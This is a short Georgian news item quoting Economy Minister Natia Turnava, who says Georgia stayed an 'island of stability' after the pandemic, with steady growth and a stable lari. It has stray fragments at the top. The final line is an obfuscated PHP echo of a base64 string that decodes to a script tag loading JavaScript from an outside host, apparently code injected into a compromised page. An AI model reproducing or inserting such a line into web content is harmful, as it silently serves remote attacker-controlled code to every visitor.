celsiusi
ავერსი შნაიდერი
საქართველოს ეკონომიკის მინისტრის, ნათია თურნავას განცხადებით, საქართველო პოსტპანდემიურ პერიოდში რეგიონში სტაბილურობის კუნძულად დარჩა.
 
როგორც მან საზოგადოებრივი მაუწყებლის ეთერში აღნიშნა, მაკროეკონომიკური ზრდა მაღალია, ლარის კურსი სტაბილური და მაკროეკონომიკური პოლიტიკა – პროგნოზირებადი. თურნავას თქმით, ეს ის ფაქტორებია, რომელთა წყალობითაც, ინვესტორი საქართველოთი დაინტერესდება.
 
„ჩვენი საერთაშორისო პარტნიორების, სავალუტო ფონდის, მსოფლიო ბანკის თუ საერთაშორისო სარეიტინგო სააგენტოების მიერ ყოველთვის აღინიშნება, რომ საქართველო რჩება ერთგვარ სტაბილურობის კუნძულად ჩვენს რეგიონში. ეს არის არა მხოლოდ პოლიტიკური, არამედ მაკროეკონომიკური სტაბილურობა.
 
ყოველთვის არის საკმაოდ მაღალი მაკროეკონომიკური ზრდა, ერთგულება კონკრეტული რეფორმებისადმი, ჩვენ არ გადაგვიხვევია რეფორმატორული კურსიდან, საიდანაც ყველაზე რთულ პანდემიურ პერიოდშიც კი არ გადაგვიხვევია, არის პროგნოზირებადი მაკროეკონომიკური პოლიტიკა – დღესდღეობით, ლარის კურსი სტაბილურია, რადგან გასული წლის დასაწყისში მთავრობამ ძალიან მნიშვნელოვანი გადაწყვეტილება მიიღო, როცა ავარჩიეთ დაბალანსებული პოლიტიკა და არ ჩავკეტეთ ბიზნესი,“ – აღნიშნა ნათია თურნავამ.
851
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");